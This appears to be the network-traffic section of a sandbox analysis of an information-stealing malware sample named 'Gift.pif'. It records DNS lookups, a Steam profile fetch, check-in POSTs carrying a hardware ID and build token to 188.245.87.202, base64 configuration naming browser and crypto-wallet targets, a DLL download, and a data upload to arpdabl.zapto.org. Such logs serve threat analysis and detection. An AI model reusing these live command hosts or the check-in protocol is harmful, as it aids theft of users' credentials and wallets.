Aug 5, 2024 18:55:01.009685993 CEST | 1.1.1.1 | 192.168.2.5 | 0x225a | Name error (3) | KLUpntqKswLWgWJpHbymfJYffqy.KLUpntqKswLWgWJpHbymfJYffqy | none | none | A (IP address) | IN (0x0001) | false
Aug 5, 2024 18:55:49.003500938 CEST | 1.1.1.1 | 192.168.2.5 | 0x36a8 | No error (0) | steamcommunity.com |  | 104.102.49.249 | A (IP address) | IN (0x0001) | false
Aug 5, 2024 18:56:53.684981108 CEST | 1.1.1.1 | 192.168.2.5 | 0x6302 | No error (0) | arpdabl.zapto.org |  | 38.180.132.96 | A (IP address) | IN (0x0001) | false

• steamcommunity.com
• 188.245.87.202
• arpdabl.zapto.org

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49752 | 38.180.132.96 | 80 | 748 | C:\Users\user\AppData\Local\Temp\366791\Gift.pif

Timestamp | Bytes transferred | Direction | Data
Aug 5, 2024 18:56:53.691958904 CEST | 330 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CBKJJJDHDGDAAKECAKJD
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
Host: arpdabl.zapto.org
Content-Length: 50529
Connection: Keep-Alive
Cache-Control: no-cache
Aug 5, 2024 18:56:53.692044973 CEST | 11124 | OUT | Data Ascii: ------CBKJJJDHDGDAAKECAKJDContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------CBKJJJDHDGDAAKECAKJDContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------CBKJJJDHDGDAAK
Aug 5, 2024 18:56:54.639024973 CEST | 161 | IN | HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Mon, 05 Aug 2024 16:56:54 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49712 | 104.102.49.249 | 443 | 748 | C:\Users\user\AppData\Local\Temp\366791\Gift.pif

Timestamp | Bytes transferred | Direction | Data
2024-08-05 16:55:49 UTC | 119 | OUT | GET /profiles/76561199747278259 HTTP/1.1
Host: steamcommunity.com
Connection: Keep-Alive
Cache-Control: no-cache
2024-08-05 16:55:50 UTC | 1870 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Mon, 05 Aug 2024 16:55:50 GMT
Content-Length: 34740
Connection: close
Set-Cookie: sessionid=763569d055cde86fecff0570; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-08-05 16:55:50 UTC | 14514 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-08-05 16:55:50 UTC | 16384 | IN | Data Ascii: destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><di
2024-08-05 16:55:50 UTC | 3768 | IN | Data Ascii: uot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div>
2024-08-05 16:55:50 UTC | 74 | IN | Data Ascii: age_content --></div>... responsive_page_frame --></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49713 | 188.245.87.202 | 443 | 748 | C:\Users\user\AppData\Local\Temp\366791\Gift.pif

Timestamp | Bytes transferred | Direction | Data
2024-08-05 16:55:51 UTC | 233 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
Host: 188.245.87.202
Connection: Keep-Alive
Cache-Control: no-cache
2024-08-05 16:55:52 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Aug 2024 16:55:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-08-05 16:55:52 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49715 | 188.245.87.202 | 443 | 748 | C:\Users\user\AppData\Local\Temp\366791\Gift.pif

Timestamp | Bytes transferred | Direction | Data
2024-08-05 16:55:53 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HIIEBAFCBKFIDGCAKKKF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
Host: 188.245.87.202
Content-Length: 279
Connection: Keep-Alive
Cache-Control: no-cache
2024-08-05 16:55:53 UTC | 279 | OUT | Data Ascii: ------HIIEBAFCBKFIDGCAKKKFContent-Disposition: form-data; name="hwid"3051E4953C162235734526-a33c7340-61ca-11ee-8c18-806e6f6e6963------HIIEBAFCBKFIDGCAKKKFContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------
2024-08-05 16:55:53 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Aug 2024 16:55:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-08-05 16:55:53 UTC | 69 | IN | Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 7c 31 7c 30 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
Data Ascii: 3a1|1|1|1|371764cf8efc1b40dfc15a6ff874b301|1|0|1|1|0|50000|00


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49716 | 188.245.87.202 | 443 | 748 | C:\Users\user\AppData\Local\Temp\366791\Gift.pif
Timestamp | Bytes transferred | Direction | Data
2024-08-05 16:55:54 UTC | 325 | OUT | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----IJDGIIEBFCBAAAAKKEGH
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
    Host: 188.245.87.202
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-08-05 16:55:54 UTC | 331 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 47 49 49 45 42 46 43 42 41 41 41 41 4b 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 47 49 49 45 42 46 43 42 41 41 41 41 4b 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 47 49 49 45 42 46 43 42 41 41 41 41 4b 4b 45 47 48 0d 0a 43 6f 6e 74
    Data Ascii: ------IJDGIIEBFCBAAAAKKEGHContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------IJDGIIEBFCBAAAAKKEGHContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------IJDGIIEBFCBAAAAKKEGHCont
2024-08-05 16:55:55 UTC | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 05 Aug 2024 16:55:55 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-08-05 16:55:55 UTC | 1564 | IN | Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
    Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49717 | 188.245.87.202 | 443 | 748 | C:\Users\user\AppData\Local\Temp\366791\Gift.pif
Timestamp | Bytes transferred | Direction | Data
2024-08-05 16:55:56 UTC | 325 | OUT | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----DGHJEHJJDAAAKEBGCFCA
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
    Host: 188.245.87.202
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-08-05 16:55:56 UTC | 331 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74
    Data Ascii: ------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------DGHJEHJJDAAAKEBGCFCACont
2024-08-05 16:55:56 UTC | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 05 Aug 2024 16:55:56 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-08-05 16:55:56 UTC | 5685 | IN | Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
    Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49718 | 188.245.87.202 | 443 | 748 | C:\Users\user\AppData\Local\Temp\366791\Gift.pif
Timestamp | Bytes transferred | Direction | Data
2024-08-05 16:55:57 UTC | 325 | OUT | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----KJKEHIIJJECFHJKECFHD
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
    Host: 188.245.87.202
    Content-Length: 332
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-08-05 16:55:57 UTC | 332 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 0d 0a 43 6f 6e 74
    Data Ascii: ------KJKEHIIJJECFHJKECFHDContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------KJKEHIIJJECFHJKECFHDContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------KJKEHIIJJECFHJKECFHDCont
2024-08-05 16:55:58 UTC | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 05 Aug 2024 16:55:58 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-08-05 16:55:58 UTC | 119 | IN | Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49719 | 188.245.87.202 | 443 | 748 | C:\Users\user\AppData\Local\Temp\366791\Gift.pif
Timestamp | Bytes transferred | Direction | Data
2024-08-05 16:55:59 UTC | 326 | OUT | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----CFCFHJDBKJKEBFHJEHII
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
    Host: 188.245.87.202
    Content-Length: 6425
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-08-05 16:55:59 UTC | 6425 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74
    Data Ascii: ------CFCFHJDBKJKEBFHJEHIIContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------CFCFHJDBKJKEBFHJEHIIContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------CFCFHJDBKJKEBFHJEHIICont
2024-08-05 16:55:59 UTC | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 05 Aug 2024 16:55:59 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-08-05 16:55:59 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49720 | 188.245.87.202 | 443 | 748 | C:\Users\user\AppData\Local\Temp\366791\Gift.pif
Timestamp | Bytes transferred | Direction | Data
2024-08-05 16:56:00 UTC | 241 | OUT | GET /sqls.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
    Host: 188.245.87.202
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-08-05 16:56:00 UTC | 261 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 05 Aug 2024 16:56:00 GMT
    Content-Type: application/octet-stream
    Content-Length: 2459136
    Connection: close
    Last-Modified: Monday, 05-Aug-2024 16:56:00 GMT
    Cache-Control: no-store, no-cache
    Accept-Ranges: bytes
2024-08-05 16:56:00 UTC | 16123 | IN | Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-08-05 16:56:00 UTC | 16384 | IN | Data Raw: 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
    Data Ascii: %:X~e!*FW|>|L1146
2024-08-05 16:56:00 UTC | 16384 | IN | Data Raw: c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8
    Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
2024-08-05 16:56:00 UTC | 16384 | IN | Data Raw: 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24
    Data Ascii: wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5t$
2024-08-05 16:56:00 UTC | 16384 | IN | Data Raw: 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b
    Data Ascii: D$$;|D$;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|
